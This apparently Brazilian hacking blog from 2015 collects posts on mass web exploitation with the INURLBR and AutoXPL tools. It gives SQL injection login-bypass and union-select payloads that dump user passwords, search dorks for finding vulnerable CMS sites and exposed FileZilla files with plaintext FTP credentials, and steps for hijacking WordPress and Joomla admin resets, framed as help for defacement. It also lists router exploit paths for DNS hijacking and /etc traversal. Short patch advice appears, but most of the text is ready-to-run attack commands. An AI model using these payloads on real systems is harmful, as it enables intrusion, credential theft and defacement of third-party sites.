Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

quinta-feira, 20 de agosto de 2015

Scanner INURLBR explorando via post

(Bom dia, Boa tarde, Boa noite) rsrsrs, Quem vos escreve é googleINURL  venho trazer uma forma diferente de exploração com scanner INURLBR usando request POST.

Quem vos escreve é googleINURL  venho trazer uma forma diferente de exploração com scanner INURLBR usando request POST.  Até o momento a grande utilização do scanner é feito por meio de exploração via  GET e validando valores de retorno, faremos o mesmo porem com comando voltados pro resquest POST.  Para tal tutorial vamos usar um exploit publicado no Exploit4arab Exploit: http://www.exploit4arab.net/exploits/1741 - Exploit Author : GeNeRaL  O XPL trata-se de explorar um falha SQLI do painel de acesso administrativo do site, CMS feito pela empresa Shafferwebdesign.


Até o momento a grande utilização do scanner é feito por meio de exploração via  GET e validando valores de retorno, faremos o mesmo porem com comando voltados pro resquest POST.

Para tal tutorial vamos usar um exploit publicado no Exploit4arab
Exploit:
http://www.exploit4arab.net/exploits/1741 - Exploit Author : GeNeRaL
Affected Webs/Versions : All

O XPL trata-se de explorar um falha SQLI do painel de acesso administrativo do site, CMS feito pela empresa Shafferwebdesign.

Dork:
intext:"by Shaffer Web Design" ext:php
intext:"Designed by Shaffer Web Design" 
intext:"Website Development provided by Shaffer Web Design"

Acesso: 
http://www.xx.com/admin.php

POC:
Request POST
http://www.xx.com/login.php?email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.us/&Submit_Login=Login to My Account

Campos explorados com um simples Bypass:
email='=' 'OR'
password='=' 'OR'

Debug request:
POC: Request POST http://www.xx.com/login.php?email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.us/&Submit_Login=Login to My Account  Campos explorados com um simples Bypass: email='=' 'OR' password='=' 'OR'  Debug request:

  • 1 - Enviamos o request Bypass para o arquivo login.php
  • 2 - O servidor aceita o request e retorna código 302  http de redirecionamento.
  • 3 - Somos redirecionados para pagina my_account.php do servidor.
Agora vamos montar comando para exploração via INURLBR.
Download:

Comando:
- Setar DORK de pesquisa:
Exemplo:
--dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'

Usando para exploração atual:
--dork 'intext:"by Shaffer Web Design" ext:php'

- Setar OUTPUT:
Exemplo:
-s  Specify the output file where it will be saved the vulnerable URLs.
     Example:  -s {file}
     Usage:    -s your_file.txt

Usando para exploração atual:
-s tutorial.txt

- Setar ifredirect validação da URL redirecionamento:
Exemplo:
 --ifredirect  Return validation method post REDIRECT_URL
     Example: --ifredirect {string_validation}
     Usage:   --ifredirect '/admin/painel.php'

Usando para exploração atual:
--ifredirect 'my_account.php'

- Setar string que será concatenada junto ao host, para isso usamos o exploit-get:
Exemplo:
 --exploit-get Defines which exploit will be injected through the GET method to each URL found.
     Example: --exploit-get {exploit_get}
     Usage:   --exploit-get "?'´%270x27;"

Usando para exploração atual:
--exploit-get '/login.php'
Ai fica a pergunta, mas por quê ? eu uso exploit-get em algo que é explorado via post ?
R: O comando exploit-get do script inurlbr é tratado mais como um concatenador de string adicionado no final de cada alvo depois executado, por esse motivo é possível usar ele sem altera o Request total.

- Setar request Bypass POST
Exemplo:
 --exploit-post Defines which exploit will be injected through the POST method to each URL found.
     Example: --exploit-post {exploit_post}
     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'

Usando para exploração atual:
--exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.theultimaterose.com/&Submit_Login=Login to My Account"

Comando completo:
php inurlbr.php --dork 'intext:"by Shaffer Web Design" ext:php' -s tutorial.txt --ifredirect 'my_account.php' --exploit-get '/login.php' --exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account"

Exemplo de Saída vulnerável:
Comando completo: php inurlbr.php --dork 'intext:"by Shaffer Web Design" ext:php' -s tutorial.txt --ifredirect 'my_account.php' --exploit-get '/login.php' --exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account"  Exemplo de Saída vulnerável:
OBS: Exemplo do print usei comando -o para abrir um arquivo com alvo.

Solução ?

  1. Sempre filtre o que vem do cliente.
  2. Não confie em dados que vem do cliente.
  3. Filtre todo request seja get ou post $_REQUEST.
  4. Use PDO sem moderação Prepared Statements é o poder.
  5. Use filtros nativos do PHP filter_var

Referencia para soluções e estudos:
http://php.net/manual/pt_BR/security.database.sql-injection.php
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
http://php.net/manual/en/pdo.prepared-statements.php
http://us3.php.net/manual/en/filter.filters.validate.php
https://www.owasp.org/images/5/57/OWASP-AppSecEU08-Janot.pdf

terça-feira, 18 de agosto de 2015

AutoXPL - Executando comandos em massa

"T0" c0m mu1ta pr3guiça de faz3r um post na língu4 d0s gringo, v41 ser em PT-BR m3smo.

Venho trazer um script que vem a muito tempo quebrando meu galho quando se trata de exploração em massa, na questão motor, mas o que seria "motor" ?
Motor refiro-me quando temos um script que pode trazer alvos seja de um arquivo,banco de dados ou gerando dinamicamente.
É justamente isso que AutoXPL faz, ele executa outros exploits de forma massiva.
Suponhamos que você tenha um script básico que explora uma determinada falha SQLI de um server
onde você precisa passar via parâmetro o alvo e só, ele explora 1 para 1.

  [+] AUTOR:        googleINURL
  [+] EMAIL:        [email protected]
  [+] Blog:         http://blog.inurl.com.br
  [+] Twitter:      https://twitter.com/googleinurl
  [+] Fanpage:      https://fb.com/InurlBrasil
  [+] Pastebin      http://pastebin.com/u/Googleinurl
  [+] GIT:          https://github.com/googleinurl
  [+] PSS:          http://packetstormsecurity.com/user/googleinurl
  [+] YOUTUBE:      http://youtube.com/c/INURLBrasil
  [+] PLUS:         http://google.com/+INURLBrasil


Vamos usar um exemplo simples de ping um script dispara um ping contra o host
Exemplo de script 1 para  1:
./xpl.sh 'www.google.com.br'

 Vamos usar um exemplo simples de ping um script dispara um ping contra o host Exemplo de script 1 para  1: ./xpl.sh 'www.google.com.br'

Agora vamos executar via AutoXPL:
DOWNLOAD:

MENU:
   -t                : SET TARGET.
   -f                : SET FILE TARGETS.
   --range           : SET RANGE IP.
   --range-rand      : SET NUMBE IP RANDOM.
   --xpl             : SET COMMAND XPL.
   Execute:
   php autoxpl.php -t target   --xpl './xpl _TARGET_'
   php autoxpl.php -f targets.txt  --xpl './xpl _TARGET_'
   php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl _TARGET_'
   php autoxpl.php --range-rand 20 --xpl './xpl _TARGET_'


Exemplo de script AutoXPL para  varios:
php autoxpl.php -f targets.txt --xpl './xpl.sh _TARGET_'

Agora vamos executar via AutoXPL: DOWNLOAD: https://github.com/googleinurl/AutoXPL  MENU:     -t                : SET TARGET.    -f                : SET FILE TARGETS.    --range           : SET RANGE IP.    --range-rand      : SET NUMBE IP RANDOM.    --xpl             : SET COMMAND XPL.    Execute:    php autoxpl.php -t target   -xpl './xpl _TARGET_'    php autoxpl.php -f targets.txt  -xpl './xpl _TARGET_'    php autoxpl.php --range '200.1.10.1,200.1.10.255' -xpl './xpl _TARGET_'    php autoxpl.php --range-rand 20 -xpl './xpl _TARGET_'   Exemplo de script AutoXPL para  varios: php autoxpl.php -f targets.txt --xpl './xpl.sh _TARGET_'

O parâmetro --xpl do script AutoXPL funciona executando um command line, assim possibilita até mesmo aviar um curl, nmap, sqlmap ou seja aquele exploit FTP, pois podemos gerar lista de IPs com o script.

Exemplo usando range de IP:
php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl.sh _TARGET_'

O parâmetro --xpl do script AutoXPL funciona executando um command line, assim possibilita até mesmo aviar um curl, nmap, sqlmap ou seja aquele exploit FTP, pois podemos gerar lista de IPs com o script.  Exemplo usando range de IP: php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl.sh _TARGET_'



domingo, 2 de agosto de 2015

Accessing sensitive data FileZilla

FileZilla FTP Passwords now Stored in Plaintext.

It's an old vulnerability FileZilla, but we can still find servers with such a security breach, Vulnerability allows access to sensitive files from the server. Containing passwords and FTP users.  FileZilla version ~ 3.0.9.2+ (and possibly older) store all FTP connection data .xml files in plain text.  The following files are what you need to know about:  filezilla.xml – Stores most recent server info including password in plaintext. recentservers.xml – Stores all recent server info including password in plaintext. sitemanager.xml – Stores all saved sites server info including password in plaintext.  These files can usually be found in the following directories: Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla" Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\" Linux: "/home/username/.filezilla/"  FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.

It's an old vulnerability FileZilla, but we can still find servers with such a security breach, Vulnerability allows access to sensitive files from the server. Containing passwords and FTP users.

FileZilla version ~ 3.0.9.2+ (and possibly older) store all FTP connection data .xml files in plain text.

The following files are what you need to know about:

filezilla.xmlStores most recent server info including password in plaintext.
recentservers.xmlStores all recent server info including password in plaintext.
sitemanager.xmlStores all saved sites server info including password in plaintext.

These files can usually be found in the following directories:
Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla"
Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\"
Linux: "/home/username/.filezilla/"

FileZilla configuration files
FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.
FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.

sitemanager.xml 
The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password.
sitemanager.xml  The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password.
filezilla.xml
The filezilla.xml file follow the same example sitemanager.xml, It starts with naming <LastServer>
filezilla.xml The filezilla.xml file follow the same example sitemanager.xml, It starts with naming <LastServer>
Quick connect 
QuickConnect lets you connect to servers without adding them to your administrative panel. when instaciado a fast connection it is added in recentservers.xml file.

Danger?
Yes the same way that you can read these files. Malicious applications can do the same, and can be read also on web servers.
ex:
www.target.com.br/folder/{file.xml}
www.target.com.br/microsite/geo243/FileZilla.xml www.target.com.br/149224/prg/programok/Total%20Commander/FileZilla/recentservers.xml

Other files:
  1. sitemanager.xml
  2. recentservers.xml
  3. filezilla.xml
  4. bookmarks.xml
  5. filters.xml
  6. layout.xml
  7. queue.xml
Looking for vulnerable servers
Now let's use the inurlbr tool to search sites with such breach and confirm such information.
Download tool: 
https://github.com/googleinurl/SCANNER-INURLBR

Setting command:
using search engines..

SET DORK:
Choose your dork search

  • "\FileZilla\" ext:xml
  • inurl:"\FileZilla\" & inurl:sitemanager.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:recentservers.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:filezilla.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:bookmarks.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:filters.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:layout.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:queue.xml -github -sourceforge
  • inurl:sitemanager.xml & ext:xml & -github -sourceforge
  • inurl:recentservers.xml & ext:xml & -github -sourceforge
  • inurl:filezilla.xml & ext:xml & -github -sourceforge
  • inurl:bookmarks.xml & ext:xml & -github -sourceforge
  • inurl:filters.xml & ext:xml & -github -sourceforge
  • inurl:layout.xml & ext:xml & -github -sourceforge
  • inurl:queue.xml & ext:xml & -github -sourceforge
  • inurl:"\FileZilla\" & inurl:(sitemanager.xml | recentservers.xml | filezilla.xml | filters.xml | bookmarks.xml | layout.xml | queue.xml) ext:xml -github -sourceforge
--dork 'YOU_DORK'
- Setting: --dork '"\FileZilla\" ext:xml'

SET FILE OUTPUT:
- Setting: -s filezilla.txt

SET TIPE VALIDATION: 
- Setting: -t
   2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET' It    also establishes connection with the exploit through the get method.

SET STRING VALIDATION:
Specify the string that will be used on the search script:
   Example: -a {string}
   Usage:    -a '<title>hello world</title>'
   If specific value is found in the target he is considered vulnerable.
Setting:     -a '<FileZilla3>'
All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate.
Ex:
All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate. Ex:


Full command - using search engines:
php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>'

OR SCANNER DORKING-FILE:
php inurlbr.php --dork-file dorks.txt -s filezilla.txt -t 2 -a '<FileZilla3>'

OUTPUT PRINT:
Full command - using search engines: php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>'  OUTPUT PRINT:




Using FileZilla the safe way

FileZilla is a great FTP client and I use it myself. But since it doesn’t protect your FTP credentials, you should protect them yourselves. Here is what you can do:

1. Don’t use the “Normal” logon type. There are the “Ask for password” and the “Interactive” types that won’t save your passwords on disk. So malware simply won’t be able to get enough information from FileZilla configuration files to hack your sites.

Pros
Malware cannot steal your FTP credential from configuration files.

Cons
You’ll have to enter your password every time you connect to your site.
It won’t save you from more sophisticated spyware such as keyloggers and traffic sniffers. But I hope this sort of trojans can be better detected by you antivirus tools since they need to hook known system functions. To protect yourself from traffic sniffers, always use SFTP instead of FTP (if possible).

2. Hosts trick. If you manage multiple web sites, interactive logon types may be really inconvenient. There is a trick that can let you use the “Normal” logon type in a more secure manner. You should create aliases of your sites’ addresses in the “hosts” file (on Windows, you can find it in C:\WINDOWS\system32\drivers\etc\).

For example you have a site “example.com” with an IP-address "208.xxx.188.166".
To create an alias you need to add the following line into the hosts file:

208.xxx.188.166         my_example

"my_example" will work the same way as “example.com” when you use it on your computer.
However, on other computers it won’t make any sense. Now use this alias in FTP connection settings instead of “example.com”.
If hackers manage to steal your FTP credentials, all they’ll have will be: (host: my_example, user: unmask, password: parasites) – the username/password pair is valid, but the host name doesn’t make any sense to them. It’s like having a key and not knowing where the door is.

Pros
Once you have added new aliases to the hosts file and to FileZilla Site Manager, you can enjoy the ease of one-click connections.
Cons

This trick will only work as long as malware steals FTP credentials from configuration files verbatim (and I have proofs that at least some malware steal the data verbatim).  If they only add a simple check that converts host names to IP-addresses before sending the credentials to their central database, the trick will be useless.  This trick is better than no protection at all, but you should not count on it.
You’ll need to update the hosts file if IP-addresses change.

3. Public Key Authentication. If your hosting plan included SSH (secure shell), you can use FileZilla in SFTP mode. One of convenient SSH features is public key authentication. And FileZilla supports this type of authorization (I didn’t use it myself, but at least have seen the UI in the “Settings” dialog). FileZilla recognizes PuTTY’s Pageant, so the configuration should be easy if you already use PuTTY for SSH.

Pros
Secure one-click connections.

Cons

This authentication method will only work if your hosting plan includes SSH/SFTP. Unfortunately, this option is rearly included into shared hosting plans.
Creating the keys and configuring FileZilla to use them is not a trivial process.
You might still have to enter a pass phrase when adding keys to the Pageant.
Other FTP programs

In this article I reviewed FileZilla only because it’s a popular FTP client that I have on my computer and it was very easy to demonstrate how little it does to protect users’ FTP credentials. However the same concerns apply to all other  programs that have FTP functions: classical FTP clients, web page editors, file managers. Popular applications like DreamWeaver, CuteFTP, Total Commander, etc. account for majority of FTP credentials leaks.

Solution Source: http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/

Referencias:
http://seclists.org/fulldisclosure/2008/Apr/508
http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/
http://bl0wj0bb3r.blogspot.com.br/2015/08/d3lphi-filezilla-password-stealer.html
http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/

quinta-feira, 30 de julho de 2015

Resetando senha WORDPRESS/JOOMLA via SQL injection

[0x00] Introdução Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.


[0x00] Introdução

Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.

[0x01] Conceito Joomla

Não sei bem se podemos chamar de conceito porém esse termo se encaixa bem e se não me falha a memoria já vi um artigo similar em algum lugar só não me recordo o autor.

[0x01a] A Hash 
   A hash utilizada pelo Joomla é uma especie de MD5 que divide a senha em partes apos o : se o numero de caracteres for impar sera acrescentado um a mais na primeira md5.

[0x01b] Exemplo:
147c6577fd36d90147c4ee3a5a0cceaa:sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0 a parte em preto corresponde a 0X4 e a parte destacada em vermelho h4x

[0x02] Injeção 

É bem semelhante a uma injeção de SQL normal apenas mudamos as tabela e colunas que vão ser exploradas em um caso normal estaríamos atras de colunas responsável pelo armazenamento do nome de usuário e senha porém dessa vez buscaremos a tabela responsável pelos códigos de ativação e email.

[0x02b] Tabela alvo
 O alvo é _user o nome pode variar porem em 90% dos casos sempre possui _user e vamos pegar as colunas email e activation.
Pegaremos o email e o introduziremos em alvo.ru/index.php?option=com_user&view=reset apos isso é só colocar o código pego na coluna activation e será possível escolher uma nova senha.

[0x03] Conceito Wordpress

Não muda muita coisa da injeção em joomla apenas possui um tipo de hash ate o momento "desconhecida" 

[0x03a] Tabela alvo e colunas
                 a tabela alvo é wp_users e as colunas são user_login user_activation_key.

[0x03b] Resetando 
    é bem semelhante ao joomla apenas muda o caminho por trata se de CMS diferentes primeiro entraremos em alvo.ru/wp-login.php?action=lostpassword e colocaremos o usuário que desejamos mudar a senha usuário obtido na user_login apos isso entraremos em /wp-login.php?action=rp&key=l33ts&login=h4x0r.

[0x04] Explicação Wordpress

Bom creio que todos tenham entendido a parte l33ts e h4x0r mas para os desatentos onde possui l33ts na url você introduz o código correspondente obtido em user_activation_key e onde localiza se H4x0r é o usuário obtido em user_login.

Solução ?
Mantenha seu CMS sempre atualizado e informe-se sobre 
novas falhas .

Exploit exercises

     O Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest.


[0x00] Introdução
     O Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest.

[0x01Como funciona ?
      O desafio é elaborado utilizando diversas VM (Virtuais Machines) e uma vasta gama de documentações e vídeo aulas.

[0x02Níveis
  [0x02a] Nebula
   O módulo Nebula inicialmente introduz problemas como buffer overflows escalação de privilegio em ambiente linux o nebula é ideal para iniciantes em escalação de privilegio.

 [0x02b] Protostar 
  O módulo Protostar é bem semelhante ao nebula o introduz a ordem de byte ao manuseio de sockets estouro de pilha sequencia de formato e a programação de rede.

 [0x02c] Fusion 
  O módulo Fusion nos introduz basicamente a criptografia e a variedade de protocolos.

 [0x02d] Main Sequence
  Modulo Main Sequence onde as coisas começam a ficar serias esse eu considero como um dos módulos mais decisivos pois o introduz a uma sequencia de testes utilizando ferramentas focadas em pentest como Metasploit SQLMAP além de analises binarias engenharia reversa analise de criptografia básica protocolos de rede além de pentest focado em WEB.

 [0x02e] Cloudroad
 Módulo final cloudroad era o nome do capture the flag realizado durante a ruxcon 2014 jogue e "seja" membro de uma organização ilegal que contrata espionagem empresarial escreva exploits e pratique engenharia reversa e muito mais infelizmente esse módulo ainda não encontra se disponível.

[0x03] Considerações finais 

Testei alguns módulos e todos se mostraram completamente capazes de fornecer um grande auxilio para garotada que quer passar o tempo ou simplesmente começar estudar  esse ramo.

[0x04Exploit exercises
 [0x04a] Download
               https://exploit-exercises.com/


sábado, 25 de julho de 2015

ThaiWeb CMS 2015Q3 - SQL Injection Web Vulnerability

Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.

Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.

THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage.
We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach.

We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard.
We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally.

Fail discovery by:
Iran Cyber Security Group - Pi.Hack (www.Iran-Cyber.Org)

Description:
The vulnerabilities are located in the id_run value of the `index.php` file. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable id_run parameter. The request method to inject the sql command is GET and the location of the issue is application-side.

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1555

Release Date:
2015-07-23

Vulnerability Laboratory ID (VL-ID):
1555

Common Vulnerability Scoring System:
8.6

Vendor Homepage:
http://www.thaiweb.net/

Google Dork:
"Powered by ThaiWeb"
"Reserved. Powered by Thaiweb."
inurl:"index.php" "Powered by Thaiweb"

PoC:
  • http://target/index.php?Content=product&id_run=[ID]'[SQL INJECTION VULNERABILITY!]
  • http://target/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--

Admin Page:
www.target.com/_adminP/

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'YOU_DORK'
OR
--dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-a all
  we will use all the search engines available in the script

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.
   removes all gets the URL

SET OUTPUT FILE:
 -s ThaiWeb.txt 

SET TIPE VALIDATION:
-t 2
       2   The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
            It also establishes connection with the exploit through the get method.

SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:    hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330

--exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(:) = 3a

Example injection:
http://www.target.gov.br/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws,0x3a,0x696e75726c62725f76756c6e%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'inurlbr_vuln'

Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

OUTPUT PRINT:
Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

ADMIN PAINEL:
ADMIN PAINEL - Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.   THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage. We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach.  We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard. We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally.

COMMAND FULL:
php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'

OUTPUT PRINT:
COMMAND FULL: php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'  OUTPUT PRINT:


Source discovery: 
http://seclists.org/fulldisclosure/2015/Jul/109

Solution - Fix & Patch:
The security vulnerability can be patched by a secure parse and encode of the vulnerable id_run parameter value in the index.php file.
Restrict the input and use a prepared statement to secure the sql statement request via GET method.

How to Avoid SQL Injection Vulnerabilities
See the OWASP SQL Injection Prevention Cheat Sheet.
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
See the OWASP Query Parameterization Cheat Sheet.
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet
See the OWASP Guide article on how to Avoid SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Guide_Project
https://www.owasp.org/index.php/Guide_to_SQL_Injection

How to Review Code for SQL Injection Vulnerabilities
See the OWASP Code Review Guide article on how to Review Code for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

How to Test for SQL Injection Vulnerabilities
See the OWASP Testing Guide article on how to Test for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

segunda-feira, 20 de julho de 2015

INURLBR searching for routers

In this short article we will use the INURLBR tool for searching routers in certain ip ranges. 

The tool has methods that generate IP ranges or X amount of ip random. Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.  Download tool INURLBR: https://github.com/googleinurl/SCANNER-INURLBR  SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.  We will use methods get and validate if the request was successfully executed retonando code 200. There will be no exploitation, let's just filtering routers.  Creating SUB_PROCESS file First we must create our file with the exploration of strings that will be used by SUB_PROCESS Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

The tool has methods that generate IP ranges or X amount of ip random.
Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS
SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

Download tool INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.

We will use methods get and validate if the request was successfully executed retonando code 200.
There will be no exploitation, let's just filtering routers.

Creating SUB_PROCESS file
First we must create our file with the exploration of strings that will be used by SUB_PROCESS
Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

File content:
/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/dvr/wwwroot/user.cgi
/web_cgi.cgi?&request=UploadFile&path=/etc/
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=$3
/html/tUserAccountControl.htm
/common/info.cgi
/hedwig.cgi
/tools_admin.asp
/hnap.cgi
/scdmz.cmd?&fwFlag=50853375&dosenbl=1
/cliget.cgi?cmd=help
/scgi-bin/platform.cgi
/soap.cgi
/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
/command.php
/authentication.cgi

Each line of the file will be concatenated with the IP target thus effecting request testing to validate that return code http.
Cada linha do arquivo será concatenada com o alvo IP assim efetuando teste de request para validar se retorno do código http.

Example:
http://TARGET/{STRING_SUB_PROCESS}

http://200.16.3.***/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1/dns_1?
http://200.16.3.***/tools_admin.asp

If the HTTP server return code 200 means that such a request has been successfully performed.
Se o código http do servidor retornar 200 significa que tal requisição foi efetuada com sucesso.

if(HTTP_CODE == 200){

VULN

}
Now let's create our command to run the tool INURLBR.
By setting command:

SET RANGE IP:
RANGE IP:
 --range Set range IP.
      Example: --range {range_start,rage_end}
      Usage:   --range '172.16.0.5,172.16.0.255'

OR

RANGE IP RANDOM:
 --range-rand Set amount of random ips.
      Example: --range-rand {rand}
      Usage:   --range-rand '50'

SET FILE OUTPUT:
-s vuln.txt

SET FILE SUB_PROCESS:
--sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt

SET TYPE OF REQUEST -  SUB_PROCESS:
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get

SET VALIDATION HTTP CODE:
 --ifcode Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:   --ifcode 200

SET TIME-OUT:
 --time-out Timeout to exit the process.
      Example: --time-out {second}
      Usage:   --time-out 3

COMPLETE COMMAND:
